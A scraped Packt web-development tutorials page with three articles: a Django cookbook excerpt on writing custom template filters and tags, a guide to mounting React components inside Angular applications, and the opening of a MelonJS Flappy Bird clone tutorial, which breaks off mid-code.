Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Web Development

1797 Articles
article-image-introduction-custom-template-filters-and-tags
Packt
13 Oct 2014
25 min read
Save for later

Introduction to Custom Template Filters and Tags

Packt
13 Oct 2014
25 min read
This article is written by Aidas Bendoratis, the author of Web Development with Django Cookbook. In this article, we will cover the following recipes: Following conventions for your own template filters and tags Creating a template filter to show how many days have passed Creating a template filter to extract the first media object Creating a template filter to humanize URLs Creating a template tag to include a template if it exists Creating a template tag to load a QuerySet in a template Creating a template tag to parse content as a template Creating a template tag to modify request query parameters As you know, Django has quite an extensive template system, with features such as template inheritance, filters for changing the representation of values, and tags for presentational logic. Moreover, Django allows you to add your own template filters and tags in your apps. Custom filters or tags should be located in a template-tag library file under the templatetags Python package in your app. Your template-tag library can then be loaded in any template with a {% load %} template tag. In this article, we will create several useful filters and tags that give more control to the template editors. Following conventions for your own template filters and tags Custom template filters and tags can become a total mess if you don't have persistent guidelines to follow. Template filters and tags should serve template editors as much as possible. They should be both handy and flexible. In this recipe, we will look at some conventions that should be used when enhancing the functionality of the Django template system. How to do it... Follow these conventions when extending the Django template system: Don't create or use custom template filters or tags when the logic for the page fits better in the view, context processors, or in model methods. When your page is context-specific, such as a list of objects or an object-detail view, load the object in the view. If you need to show some content on every page, create a context processor. Use custom methods of the model instead of template filters when you need to get some properties of an object not related to the context of the template. Name the template-tag library with the _tags suffix. When your app is named differently than your template-tag library, you can avoid ambiguous package importing problems. In the newly created library, separate filters from tags, for example, by using comments such as the following: # -*- coding: UTF-8 -*-from django import templateregister = template.Library()### FILTERS #### .. your filters go here..### TAGS #### .. your tags go here.. Create template tags that are easy to remember by including the following constructs: for [app_name.model_name]: Include this construct to use a specific model using [template_name]: Include this construct to use a template for the output of the template tag limit [count]: Include this construct to limit the results to a specific amount as [context_variable]: Include this construct to save the results to a context variable that can be reused many times later Try to avoid multiple values defined positionally in template tags unless they are self-explanatory. Otherwise, this will likely confuse the template developers. Make as many arguments resolvable as possible. Strings without quotes should be treated as context variables that need to be resolved or as short words that remind you of the structure of the template tag components. See also The Creating a template filter to show how many days have passed recipe The Creating a template filter to extract the first media object recipe The Creating a template filter to humanize URLs recipe The Creating a template tag to include a template if it exists recipe The Creating a template tag to load a QuerySet in a template recipe The Creating a template tag to parse content as a template recipe The Creating a template tag to modify request query parameters recipe Creating a template filter to show how many days have passed Not all people keep track of the date, and when talking about creation or modification dates of cutting-edge information, for many of us, it is more convenient to read the time difference, for example, the blog entry was posted three days ago, the news article was published today, and the user last logged in yesterday. In this recipe, we will create a template filter named days_since that converts dates to humanized time differences. Getting ready Create the utils app and put it under INSTALLED_APPS in the settings, if you haven't done that yet. Then, create a Python package named templatetags inside this app (Python packages are directories with an empty __init__.py file). How to do it... Create a utility_tags.py file with this content: #utils/templatetags/utility_tags.py# -*- coding: UTF-8 -*-from datetime import datetimefrom django import templatefrom django.utils.translation import ugettext_lazy as _from django.utils.timezone import now as tz_nowregister = template.Library()### FILTERS ###@register.filterdef days_since(value):""" Returns number of days between today and value."""today = tz_now().date()if isinstance(value, datetime.datetime):value = value.date()diff = today - valueif diff.days > 1:return _("%s days ago") % diff.dayselif diff.days == 1:return _("yesterday")elif diff.days == 0:return _("today")else:# Date is in the future; return formatted date.return value.strftime("%B %d, %Y") How it works... If you use this filter in a template like the following, it will render something like yesterday or 5 days ago: {% load utility_tags %}{{ object.created|days_since }} You can apply this filter to the values of the date and datetime types. Each template-tag library has a register where filters and tags are collected. Django filters are functions registered by the register.filter decorator. By default, the filter in the template system will be named the same as the function or the other callable object. If you want, you can set a different name for the filter by passing name to the decorator, as follows: @register.filter(name="humanized_days_since")def days_since(value):... The filter itself is quite self-explanatory. At first, the current date is read. If the given value of the filter is of the datetime type, the date is extracted. Then, the difference between today and the extracted value is calculated. Depending on the number of days, different string results are returned. There's more... This filter is easy to extend to also show the difference in time, such as just now, 7 minutes ago, or 3 hours ago. Just operate the datetime values instead of the date values. See also The Creating a template filter to extract the first media object recipe The Creating a template filter to humanize URLs recipe Creating a template filter to extract the first media object Imagine that you are developing a blog overview page, and for each post, you want to show images, music, or videos in that page taken from the content. In such a case, you need to extract the <img>, <object>, and <embed> tags out of the HTML content of the post. In this recipe, we will see how to do this using regular expressions in the get_first_media filter. Getting ready We will start with the utils app that should be set in INSTALLED_APPS in the settings and the templatetags package inside this app. How to do it... In the utility_tags.py file, add the following content: #utils/templatetags/utility_tags.py# -*- coding: UTF-8 -*-import refrom django import templatefrom django.utils.safestring import mark_saferegister = template.Library()### FILTERS ###media_file_regex = re.compile(r"<object .+?</object>|"r"<(img|embed) [^>]+>") )@register.filterdef get_first_media(content):""" Returns the first image or flash file from the htmlcontent """m = media_file_regex.search(content)media_tag = ""if m:media_tag = m.group()return mark_safe(media_tag) How it works... While the HTML content in the database is valid, when you put the following code in the template, it will retrieve the <object>, <img>, or <embed> tags from the content field of the object, or an empty string if no media is found there: {% load utility_tags %} {{ object.content|get_first_media }} At first, we define the compiled regular expression as media_file_regex, then in the filter, we perform a search for that regular expression pattern. By default, the result will show the <, >, and & symbols escaped as &lt;, &gt;, and &amp; entities. But we use the mark_safe function that marks the result as safe HTML ready to be shown in the template without escaping. There's more... It is very easy to extend this filter to also extract the <iframe> tags (which are more recently being used by Vimeo and YouTube for embedded videos) or the HTML5 <audio> and <video> tags. Just modify the regular expression like this: media_file_regex = re.compile(r"<iframe .+?</iframe>|"r"<audio .+?</ audio>|<video .+?</video>|"r"<object .+?</object>|<(img|embed) [^>]+>") See also The Creating a template filter to show how many days have passed recipe The Creating a template filter to humanize URLs recipe Creating a template filter to humanize URLs Usually, common web users enter URLs into address fields without protocol and trailing slashes. In this recipe, we will create a humanize_url filter used to present URLs to the user in a shorter format, truncating very long addresses, just like what Twitter does with the links in tweets. Getting ready As in the previous recipes, we will start with the utils app that should be set in INSTALLED_APPS in the settings, and should contain the templatetags package. How to do it... In the FILTERS section of the utility_tags.py template library in the utils app, let's add a filter named humanize_url and register it: #utils/templatetags/utility_tags.py# -*- coding: UTF-8 -*-import refrom django import templateregister = template.Library()### FILTERS ###@register.filterdef humanize_url(url, letter_count):""" Returns a shortened human-readable URL """letter_count = int(letter_count)re_start = re.compile(r"^https?://")re_end = re.compile(r"/$")url = re_end.sub("", re_start.sub("", url))if len(url) > letter_count:url = u"%s…" % url[:letter_count - 1]return url How it works... We can use the humanize_url filter in any template like this: {% load utility_tags %}<a href="{{ object.website }}" target="_blank">{{ object.website|humanize_url:30 }}</a> The filter uses regular expressions to remove the leading protocol and the trailing slash, and then shortens the URL to the given amount of letters, adding an ellipsis to the end if the URL doesn't fit into the specified letter count. See also The Creating a template filter to show how many days have passed recipe The Creating a template filter to extract the first media object recipe The Creating a template tag to include a template if it exists recipe Creating a template tag to include a template if it exists Django has the {% include %} template tag that renders and includes another template. However, in some particular situations, there is a problem that an error is raised if the template does not exist. In this recipe, we will show you how to create a {% try_to_include %} template tag that includes another template, but fails silently if there is no such template. Getting ready We will start again with the utils app that should be installed and is ready for custom template tags. How to do it... Template tags consist of two things: the function parsing the arguments of the template tag and the node class that is responsible for the logic of the template tag as well as for the output. Perform the following steps: First, let's create the function parsing the template-tag arguments: #utils/templatetags/utility_tags.py# -*- coding: UTF-8 -*-from django import templatefrom django.template.loader import get_templateregister = template.Library()### TAGS ###@register.tagdef try_to_include(parser, token):"""Usage: {% try_to_include "sometemplate.html" %}This will fail silently if the template doesn't exist.If it does, it will be rendered with the current context."""try:tag_name, template_name = token.split_contents()except ValueError:raise template.TemplateSyntaxError, "%r tag requires a single argument" % token.contents.split()[0]return IncludeNode(template_name) Then, we need the node class in the same file, as follows: class IncludeNode(template.Node):def __init__(self, template_name):self.template_name = template_namedef render(self, context):try:# Loading the template and rendering ittemplate_name = template.resolve_variable(self. template_name, context)included_template = get_template(template_name).render(context)except template.TemplateDoesNotExist:included_template = ""return included_template How it works... The {% try_to_include %} template tag expects one argument, that is, template_name. So, in the try_to_include function, we are trying to assign the split contents of the token only to the tag_name variable (which is "try_to_include") and the template_name variable. If this doesn't work, the template syntax error is raised. The function returns the IncludeNode object, which gets the template_name field for later usage. In the render method of IncludeNode, we resolve the template_name variable. If a context variable was passed to the template tag, then its value will be used here for template_name. If a quoted string was passed to the template tag, then the content within quotes will be used for template_name. Lastly, we try to load the template and render it with the current template context. If that doesn't work, an empty string is returned. There are at least two situations where we could use this template tag: When including a template whose path is defined in a model, as follows: {% load utility_tags %}{% try_to_include object.template_path %} When including a template whose path is defined with the {% with %} template tag somewhere high in the template context variable's scope. This is especially useful when you need to create custom layouts for plugins in the placeholder of a template in Django CMS: #templates/cms/start_page.html{% with editorial_content_template_path="cms/plugins/editorial_content/start_page.html" %}{% placeholder "main_content" %}{% endwith %}#templates/cms/plugins/editorial_content.html{% load utility_tags %}{% if editorial_content_template_path %}{% try_to_include editorial_content_template_path %}{% else %}<div><!-- Some default presentation ofeditorial content plugin --></div>{% endif % There's more... You can use the {% try_to_include %} tag as well as the default {% include %} tag to include templates that extend other templates. This has a beneficial use for large-scale portals where you have different kinds of lists in which complex items share the same structure as widgets but have a different source of data. For example, in the artist list template, you can include the artist item template as follows: {% load utility_tags %}{% for object in object_list %}{% try_to_include "artists/includes/artist_item.html" %}{% endfor %} This template will extend from the item base as follows: {# templates/artists/includes/artist_item.html #}{% extends "utils/includes/item_base.html" %}  {% block item_title %}{{ object.first_name }} {{ object.last_name }}{% endblock %} The item base defines the markup for any item and also includes a Like widget, as follows: {# templates/utils/includes/item_base.html #}{% load likes_tags %}<h3>{% block item_title %}{% endblock %}</h3>{% if request.user.is_authenticated %}{% like_widget for object %}{% endif %} See also  The Creating a template tag to load a QuerySet in a template recipe The Creating a template tag to parse content as a template recipe The Creating a template tag to modify request query parameters recipe Creating a template tag to load a QuerySet in a template Most often, the content that should be shown in a web page will have to be defined in the view. If this is the content to show on every page, it is logical to create a context processor. Another situation is when you need to show additional content such as the latest news or a random quote on some specific pages, for example, the start page or the details page of an object. In this case, you can load the necessary content with the {% get_objects %} template tag, which we will implement in this recipe. Getting ready Once again, we will start with the utils app that should be installed and ready for custom template tags. How to do it... Template tags consist of function parsing arguments passed to the tag and a node class that renders the output of the tag or modifies the template context. Perform the following steps: First, let's create the function parsing the template-tag arguments, as follows: #utils/templatetags/utility_tags.py# -*- coding: UTF-8 -*-from django.db import modelsfrom django import templateregister = template.Library()### TAGS ###@register.tagdef get_objects(parser, token):"""Gets a queryset of objects of the model specified by appandmodel namesUsage:{% get_objects [<manager>.]<method> from<app_name>.<model_name> [limit <amount>] as<var_name> %}Example:{% get_objects latest_published from people.Personlimit 3 as people %}{% get_objects site_objects.all from news.Articlelimit 3 as articles %}{% get_objects site_objects.all from news.Articleas articles %}"""amount = Nonetry:tag_name, manager_method, str_from, appmodel,str_limit,amount, str_as, var_name = token.split_contents()except ValueError:try:tag_name, manager_method, str_from, appmodel, str_as,var_name = token.split_contents()except ValueError:raise template.TemplateSyntaxError, "get_objects tag requires a following syntax: ""{% get_objects [<manager>.]<method> from ""<app_ name>.<model_name>"" [limit <amount>] as <var_name> %}"try:app_name, model_name = appmodel.split(".")except ValueError:raise template.TemplateSyntaxError, "get_objects tag requires application name and ""model name separated by a dot"model = models.get_model(app_name, model_name)return ObjectsNode(model, manager_method, amount, var_name) Then, we create the node class in the same file, as follows: class ObjectsNode(template.Node):def __init__(self, model, manager_method, amount, var_name):self.model = modelself.manager_method = manager_methodself.amount = amountself.var_name = var_namedef render(self, context):if "." in self.manager_method:manager, method = self.manager_method.split(".")else:manager = "_default_manager"method = self.manager_methodqs = getattr(getattr(self.model, manager),method,self.model._default_manager.none,)()if self.amount:amount = template.resolve_variable(self.amount,context)context[self.var_name] = qs[:amount]else:context[self.var_name] = qsreturn "" How it works... The {% get_objects %} template tag loads a QuerySet defined by the manager method from a specified app and model, limits the result to the specified amount, and saves the result to a context variable. This is the simplest example of how to use the template tag that we have just created. It will load five news articles in any template using the following snippet: {% load utility_tags %}{% get_objects all from news.Article limit 5 as latest_articles %}{% for article in latest_articles %}<a href="{{ article.get_url_path }}">{{ article.title }}</a>{% endfor %} This is using the all method of the default objects manager of the Article model, and will sort the articles by the ordering attribute defined in the Meta class. A more advanced example would be required to create a custom manager with a custom method to query objects from the database. A manager is an interface that provides database query operations to models. Each model has at least one manager called objects by default. As an example, let's create the Artist model, which has a draft or published status, and a new manager, custom_manager, which allows you to select random published artists: #artists/models.py# -*- coding: UTF-8 -*-from django.db import modelsfrom django.utils.translation import ugettext_lazy as _STATUS_CHOICES = (('draft', _("Draft"),('published', _("Published"),)class ArtistManager(models.Manager):def random_published(self):return self.filter(status="published").order_by('?')class Artist(models.Model):# ...status = models.CharField(_("Status"), max_length=20,choices=STATUS_CHOICES)custom_manager = ArtistManager() To load a random published artist, you add the following snippet to any template: {% load utility_tags %}{% get_objects custom_manager.random_published from artists.Artistlimit 1 as random_artists %}{% for artist in random_artists %}{{ artist.first_name }} {{ artist.last_name }}{% endfor %} Let's look at the code of the template tag. In the parsing function, there is one of two formats expected: with the limit and without it. The string is parsed, the model is recognized, and then the components of the template tag are passed to the ObjectNode class. In the render method of the node class, we check the manager's name and its method's name. If this is not defined, _default_manager will be used, which is, in most cases, the same as objects. After that, we call the manager method and fall back to empty the QuerySet if the method doesn't exist. If the limit is defined, we resolve the value of it and limit the QuerySet. Lastly, we save the QuerySet to the context variable. See also The Creating a template tag to include a template if it exists recipe The Creating a template tag to parse content as a template recipe The Creating a template tag to modify request query parameters recipe Creating a template tag to parse content as a template In this recipe, we will create a template tag named {% parse %}, which allows you to put template snippets into the database. This is valuable when you want to provide different content for authenticated and non-authenticated users, when you want to include a personalized salutation, or when you don't want to hardcode media paths in the database. Getting ready No surprise, we will start with the utils app that should be installed and ready for custom template tags. How to do it... Template tags consist of two things: the function parsing the arguments of the template tag and the node class that is responsible for the logic of the template tag as well as for the output. Perform the following steps: First, let's create the function parsing the template-tag arguments, as follows: #utils/templatetags/utility_tags.py# -*- coding: UTF-8 -*-from django import templateregister = template.Library()### TAGS ###@register.tagdef parse(parser, token):"""Parses the value as a template and prints it or saves to avariableUsage:{% parse <template_value> [as <variable>] %}Examples:{% parse object.description %}{% parse header as header %}{% parse "{{ MEDIA_URL }}js/" as js_url %}"""bits = token.split_contents()tag_name = bits.pop(0)try:template_value = bits.pop(0)var_name = Noneif len(bits) == 2:bits.pop(0) # remove the word "as"var_name = bits.pop(0)except ValueError:raise template.TemplateSyntaxError, "parse tag requires a following syntax: ""{% parse <template_value> [as <variable>] %}"return ParseNode(template_value, var_name) Then, we create the node class in the same file, as follows: class ParseNode(template.Node):def __init__(self, template_value, var_name):self.template_value = template_valueself.var_name = var_namedef render(self, context):template_value = template.resolve_variable(self.template_value, context)t = template.Template(template_value)context_vars = {}for d in list(context):for var, val in d.items():context_vars[var] = valresult = t.render(template.RequestContext(context['request'], context_vars))if self.var_name:context[self.var_name] = resultreturn ""return result How it works... The {% parse %} template tag allows you to parse a value as a template and to render it immediately or to save it as a context variable. If we have an object with a description field, which can contain template variables or logic, then we can parse it and render it using the following code: {% load utility_tags %}{% parse object.description %} It is also possible to define a value to parse using a quoted string like this: {% load utility_tags %}{% parse "{{ STATIC_URL }}site/img/" as img_path %}<img src="{{ img_path }}someimage.png" alt="" /> Let's have a look at the code of the template tag. The parsing function checks the arguments of the template tag bit by bit. At first, we expect the name parse, then the template value, then optionally the word as, and lastly the context variable name. The template value and the variable name are passed to the ParseNode class. The render method of that class at first resolves the value of the template variable and creates a template object out of it. Then, it renders the template with all the context variables. If the variable name is defined, the result is saved to it; otherwise, the result is shown immediately. See also The Creating a template tag to include a template if it exists recipe The Creating a template tag to load a QuerySet in a template recipe The Creating a template tag to modify request query parameters recipe Creating a template tag to modify request query parameters Django has a convenient and flexible system to create canonical, clean URLs just by adding regular expression rules in the URL configuration files. But there is a lack of built-in mechanisms to manage query parameters. Views such as search or filterable object lists need to accept query parameters to drill down through filtered results using another parameter or to go to another page. In this recipe, we will create a template tag named {% append_to_query %}, which lets you add, change, or remove parameters of the current query. Getting ready Once again, we start with the utils app that should be set in INSTALLED_APPS and should contain the templatetags package. Also, make sure that you have the request context processor set for the TEMPLATE_CONTEXT_PROCESSORS setting, as follows: #settings.pyTEMPLATE_CONTEXT_PROCESSORS = ("django.contrib.auth.context_processors.auth","django.core.context_processors.debug","django.core.context_processors.i18n","django.core.context_processors.media","django.core.context_processors.static","django.core.context_processors.tz","django.contrib.messages.context_processors.messages","django.core.context_processors.request",) How to do it... For this template tag, we will be using the simple_tag decorator that parses the components and requires you to define just the rendering function, as follows: #utils/templatetags/utility_tags.py# -*- coding: UTF-8 -*-import urllibfrom django import templatefrom django.utils.encoding import force_strregister = template.Library()### TAGS ###@register.simple_tag(takes_context=True)def append_to_query(context, **kwargs):""" Renders a link with modified current query parameters """query_params = context['request'].GET.copy()for key, value in kwargs.items():query_params[key] = valuequery_string = u""if len(query_params):query_string += u"?%s" % urllib.urlencode([(key, force_str(value)) for (key, value) inquery_params. iteritems() if value]).replace('&', '&amp;')return query_string How it works... The {% append_to_query %} template tag reads the current query parameters from the request.GET dictionary-like QueryDict object to a new dictionary named query_params, and loops through the keyword parameters passed to the template tag updating the values. Then, the new query string is formed, all spaces and special characters are URL-encoded, and ampersands connecting query parameters are escaped. This new query string is returned to the template. To read more about QueryDict objects, refer to the official Django documentation: https://docs.djangoproject.com/en/1.6/ref/request-response/#querydict-objects Let's have a look at an example of how the {% append_to_query %} template tag can be used. If the current URL is http://127.0.0.1:8000/artists/?category=fine-art&page=1, we can use the following template tag to render a link that goes to the next page: {% load utility_tags %}<a href="{% append_to_query page=2 %}">2</a> The following is the output rendered, using the preceding template tag: <a href="?category=fine-art&amp;page=2">2</a> Or we can use the following template tag to render a link that resets pagination and goes to another category: {% load utility_tags i18n %} <a href="{% append_to_query category="sculpture" page="" %}">{% trans "Sculpture" %}</a> The following is the output rendered, using the preceding template tag: <a href="?category=sculpture">Sculpture</a> See also The Creating a template tag to include a template if it exists recipe The Creating a template tag to load a QuerySet in a template recipe The Creating a template tag to parse content as a template recipe Summary In this article showed you how to create and use your own template filters and tags, as the default Django template system is quite extensive, and there are more things to add for different cases. Resources for Article: Further resources on this subject: Adding a developer with Django forms [Article] So, what is Django? [Article] Django JavaScript Integration: jQuery In-place Editing Using Ajax [Article]
Read more
  • 0
  • 0
  • 4305

article-image-interfacing-react-components-angular-applications
Patrick Marabeas
26 Sep 2014
10 min read
Save for later

Interfacing React Components with Angular Applications

Patrick Marabeas
26 Sep 2014
10 min read
There's been talk lately of using React as the view within Angular's MVC architecture. Angular, as we all know, uses dirty checking. As I'll touch on later, it accepts the fact of (minor) performance loss to gain the great two-way data binding it has. React, on the other hand, uses a virtual DOM and only renders the difference. This results in very fast performance. So, how do we leverage React's performance from our Angular application? Can we retain two-way data flow? And just how significant is the performance increase? The nrg module and demo code can be found over on my GitHub. The application To demonstrate communication between the two frameworks, let's build a reusable Angular module (nrg[Angular(ng) + React(r) = energy(nrg)!]) which will render (and re-render) a React component when our model changes. The React component will be composed of aninputandpelement that will display our model and will also update the model on change. To show this, we'll add aninputandpto our view bound to the model. In essence, changes to either input should result in all elements being kept in sync. We'll also add a button to our component that will demonstrate component unmounting on scope destruction. ;( ;(function(window, document, angular, undefined) { 'use strict'; angular.module('app', ['nrg']) .controller('MainController', ['$scope', function($scope) { $scope.text = 'This is set in Angular'; $scope.destroy = function() { $scope.$destroy(); } }]); })(window, document, angular); data-component specifies the React component we want to mount.data-ctrl (optional) specifies the controller we want to inject into the directive—this will allow specific components to be accessible onscope itself rather than scope.$parent.data-ng-model is the model we are going to pass between our Angular controller and our React view. <div data-ng-controller="MainController"> <!-- React component --> <div data-component="reactComponent" data-ctrl="" data-ng-model="text"> <!-- <input /> --> <!-- <button></button> --> <!-- <p></p> --> </div> <!-- Angular view --> <input type="text" data-ng-model="text" /> <p>{{text}}</p> </div> As you can see, the view has meaning when using Angular to render React components.<div data-component="reactComponent" data-ctrl="" data-ng-model="text"></div> has meaning when compared to<div id="reactComponent"></div>,which requires referencing a script file to see what component (and settings) will be mounted on that element. The Angular module - nrg.js The main functions of this reusable Angular module will be to: Specify the DOM element that the component should be mounted onto. Render the React component when changes have been made to the model. Pass the scope and element attributes to the component. Unmount the React component when the Angular scope is destroyed. The skeleton of our module looks like this: ;(function(window, document, angular, React, undefined) { 'use strict'; angular.module('nrg', []) To keep our code modular and extensible, we'll create a factory that will house our component functions, which are currently justrender and unmount . .factory('ComponentFactory', [function() { return { render: function() { }, unmount: function() { } } }]) This will be injected into our directive. .directive('component', ['$controller', 'ComponentFactory', function($controller, ComponentFactory) { return { restrict: 'EA', If a controller has been specified on the elements viadata-ctrl , then inject the$controller service. As mentioned earlier, this will allow scope variables and functions to be used within the React component to be accessible directly onscope , rather thanscope.$parent (the controller also doesn't need to be declared in the view withng-controller ). controller: function($scope, $element, $attrs){ return ($attrs.ctrl) ? $controller($attrs.ctrl, {$scope:$scope, $element:$element, $attrs:$attrs}) : null; }, Here’s an isolated scope with two-way-binding ondata-ng-model . scope: { ngModel: '=' }, link: function(scope, element, attrs) { // Calling ComponentFactory.render() & watching ng-model } } }]); })(window, document, angular, React); ComponentFactory Fleshing out theComponentFactory , we'll need to know how to render and unmount components. React.renderComponent( ReactComponent component, DOMElement container, [function callback] ) As such, we'll need to pass the component we wish to mount (component), the container we want to mount it in (element) and any properties (attrsandscope) we wish to pass to the component. This render function will be called every time the model is updated, so the updated scope will be pushed through each time. According to the React documentation, "If the React component was previously rendered into container, this (React.renderComponent) will perform an update on it and only mutate the DOM as necessary to reflect the latest React component." .factory('ComponentFactory', [function() { return { render: function(component, element, scope, attrs) { // If you have name-spaced your components, you'll want to specify that here - or pass it in via an attribute etc React.renderComponent(window[component]({ scope: scope, attrs: attrs }), element[0]); }, unmount: function(element) { React.unmountComponentAtNode(element[0]); } } }]) Component directive Back in our directive, we can now set up when we are going to call these two functions. link: function(scope, element, attrs) { // Collect the elements attrs in a nice usable object var attributes = {}; angular.forEach(element[0].attributes, function(a) { attributes[a.name.replace('data-','')] = a.value; }); // Render the component when the directive loads ComponentFactory.render(attrs.component, element, scope, attributes); // Watch the model and re-render the component scope.$watch('ngModel', function() { ComponentFactory.render(attrs.component, element, scope, attributes); }, true); // Unmount the component when the scope is destroyed scope.$on('$destroy', function () { ComponentFactory.unmount(element); }); } This implements dirty checking to see if the model has been updated. I haven't played around too much to see if there's a notable difference in performance between this and using a broadcast/listener. That said, to get a listener working as expected, you will need to wrap the render call in a $timeout to push it to the bottom of the stack to ensure scope is updated. scope.$on('renderMe', function() { $timeout(function() { ComponentFactory.render(attrs.component, element, scope, attributes); }); }); The React component We can now build our React component, which will use the model we defined as well as inform Angular of any updates it performs. /** @jsx React.DOM */ ;(function(window, document, React, undefined) { 'use strict'; window.reactComponent = React.createClass({ This is the content that will be rendered into the container. The properties that we passed to the component ({ scope: scope, attrs: attrs }) when we called React.renderComponent back in our component directive are now accessible via this.props. render: function(){ return ( <div> <input type='text' value={this.props.scope.ngModel} onChange={this.handleChange} /> <button onClick={this.deleteScope}>Destroy Scope</button> <p>{this.props.scope.ngModel}</p> </div> ) }, Via the on Change   event, we can call for Angular to run a digest, just as we normally would, but accessing scope via this.props : handleChange: function(event) { var _this = this; this.props.scope.$apply(function() { _this.props.scope.ngModel = event.target.value; }); }, Here we deal with the click event deleteScope  . The controller is accessible via scope.$parent  . If we had injected a controller into the component directive, its contents would be accessible directly on scope  , just as ngModel is.     deleteScope: function() { this.props.scope.$parent.destroy(); } }); })(window, document, React); The result Putting this code together (you can view the completed code on GitHub, or see it in action) we end up with: Two input elements, both of which update the model. Any changes in either our Angular application or our React view will be reflected in both. A React component button that calls a function in our MainController, destroying the scope and also resulting in the unmounting of the component. Pretty cool. But where is my perf increase!? This is obviously too small an application for anything to be gained by throwing your view over to React. To demonstrate just how much faster applications can be (by using React as the view), we'll throw a kitchen sink worth of randomly generated data at it. 5000 bits to be precise. Now, it should be stated that you probably have a pretty questionable UI if you have this much data binding going on. Misko Hevery has a great response regarding Angular's performance on StackOverflow. In summary: Humans are: Slow: Anything faster than 50ms is imperceptible to humans and thus can be considered as "instant". Limited: You can't really show more than about 2000 pieces of information to a human on a single page. Anything more than that is really bad UI, and humans can't process this anyway. Basically, know Angular's limits and your user's limits! That said, the following performance test was certainly accentuated on mobile devices. Though, on the flip side, UI should be simpler on mobile. Brute force performance demonstration ;(function(window, document, angular, undefined) { 'use strict'; angular.module('app') .controller('NumberController', ['$scope', function($scope) { $scope.numbers = []; ($scope.numGen = function(){ for(var i = 0; i < 5000; i++) { $scope.numbers[i] = Math.floor(Math.random() * (999999999999999 - 1)) + 1; } })(); }]); })(window, document, angular); Angular ng-repeat <div data-ng-controller="NumberController"> <button ng-click="numGen()">Refresh Data</button> <table> <tr ng-repeat="number in numbers"> <td>{{number}}</td> </tr> </table> </div> There was definitely lag felt as the numbers were loaded in and refreshed. From start to finish, this took around 1.5 seconds. React component <div data-ng-controller="NumberController"> <button ng-click="numGen()">Refresh Data</button> <div data-component="numberComponent" data-ng-model="numbers"></div> </div> ;(function(window, document, React, undefined) { window.numberComponent = React.createClass({ render: function() { var rows = this.props.scope.ngModel.map(function(number) { return ( <tr> <td>{number}</td> </tr> ); }); return ( <table>{rows}</table> ); } }); })(window, document, React); So that just happened. 270 milliseconds start to finish. Around 80% faster! Conclusion So, should you go rewrite all those Angular modules as React components? Probably not. It really comes down to the application you are developing and how dependent you are on OSS. It's definitely possible that a handful of complex modules could put your application in the realm of “feeling a tad sluggish”, but it should be remembered that perceived performance is all that matters to the user. Altering the manner in which content is loaded could end up being a better investment of time. Users will definitely feel performance increases on mobile websites sooner, however, and is certainly something to keep in mind. The nrg module and demo code can be found over on my GitHub. Visit our JavaScript page for more JavaScript content and tutorials!  About the author A guest post by Patrick Marabeas, a freelance frontend developer who loves learning and working with cutting edge web technologies. He spends much of his free time developing Angular modules, such as ng-FitText, ng-Slider, ng-YouTubeAPI, and ng-ScrollSpy. You can follow him on Twitter: @patrickmarabeas.
Read more
  • 0
  • 0
  • 8901

article-image-how-to-create-flappy-bird-clone-with-melonjs
Ellison Leao
26 Sep 2014
18 min read
Save for later

How to Create a Flappy Bird Clone with MelonJS

Ellison Leao
26 Sep 2014
18 min read
How to create a Flappy Bird clone using MelonJS Web game frameworks such as MelonJS are becoming more popular every day. In this post I will show you how easy it is to create a Flappy Bird clone game using the MelonJS bag of tricks. I will assume that you have some experience with JavaScript and that you have visited the melonJS official page. All of the code shown in this post is available on this GitHub repository. Step 1 - Organization A MelonJS game can be divided into three basic objects: Scene objects: Define all of the game scenes (Play, Menus, Game Over, High Score, and so on) Game entities: Add all of the stuff that interacts on the game (Players, enemies, collectables, and so on) Hud entities: All of the HUD objects to be inserted on the scenes (Life, Score, Pause buttons, and so on) For our Flappy Bird game, first create a directory, flappybirdgame, on your machine. Then create the following structure: flabbybirdgame | |--js |--|--entities |--|--screens |--|--game.js |--|--resources.js |--data |--|--img |--|--bgm |--|--sfx |--lib |--index.html Just a quick explanation about the folders: The js contains all of the game source. The entities folder will handle the HUD and the Game entities. In the screen folder, we will create all of the scene files. The game.js is the main game file. It will initialize all of the game resources, which is created in the resources.js file, the input, and the loading of the first scene. The data folder is where all of the assets, sounds, and game themes are inserted. I divided the folders into img for images (backgrounds, player atlas, menus, and so on), bgm for background music files (we need to provide a .ogg and .mp3 file for each sound if we want full compatibility with all browsers) and sfx for sound effects. In the lib folder we will add the current 1.0.2 version of MelonJS. Lastly, an index.html file is used to build the canvas. Step 2 - Implementation First we will build the game.js file: var game = { data: { score : 0, steps: 0, start: false, newHiScore: false, muted: false }, "onload": function() { if (!me.video.init("screen", 900, 600, true, 'auto')) { alert("Your browser does not support HTML5 canvas."); return; } me.audio.init("mp3,ogg"); me.loader.onload = this.loaded.bind(this); me.loader.preload(game.resources); me.state.change(me.state.LOADING); }, "loaded": function() { me.state.set(me.state.MENU, new game.TitleScreen()); me.state.set(me.state.PLAY, new game.PlayScreen()); me.state.set(me.state.GAME_OVER, new game.GameOverScreen()); me.input.bindKey(me.input.KEY.SPACE, "fly", true); me.input.bindKey(me.input.KEY.M, "mute", true); me.input.bindPointer(me.input.KEY.SPACE); me.pool.register("clumsy", BirdEntity); me.pool.register("pipe", PipeEntity, true); me.pool.register("hit", HitEntity, true); // in melonJS 1.0.0, viewport size is set to Infinity by default me.game.viewport.setBounds(0, 0, 900, 600); me.state.change(me.state.MENU); } }; The game.js is divided into: data object: This global object will handle all of the global variables that will be used on the game. For our game we will use score to record the player score, and steps to record how far the bird goes. The other variables are flags that we are using to control some game states. onload method: This method preloads the resources and initializes the canvas screen and then calls the loaded method when it's done. loaded method: This method first creates and puts into the state stack the screens that we will use on the game. We will use the implementation for these screens later on. It enables all of the input keys to handle the game. For our game we will be using the space and left mouse keys to control the bird and the M key to mute sound. It also adds the game entities BirdEntity, PipeEntity and the HitEntity in the game poll. I will explain the entities later. Then you need to create the resource.js file: game.resources = [ {name: "bg", type:"image", src: "data/img/bg.png"}, {name: "clumsy", type:"image", src: "data/img/clumsy.png"}, {name: "pipe", type:"image", src: "data/img/pipe.png"}, {name: "logo", type:"image", src: "data/img/logo.png"}, {name: "ground", type:"image", src: "data/img/ground.png"}, {name: "gameover", type:"image", src: 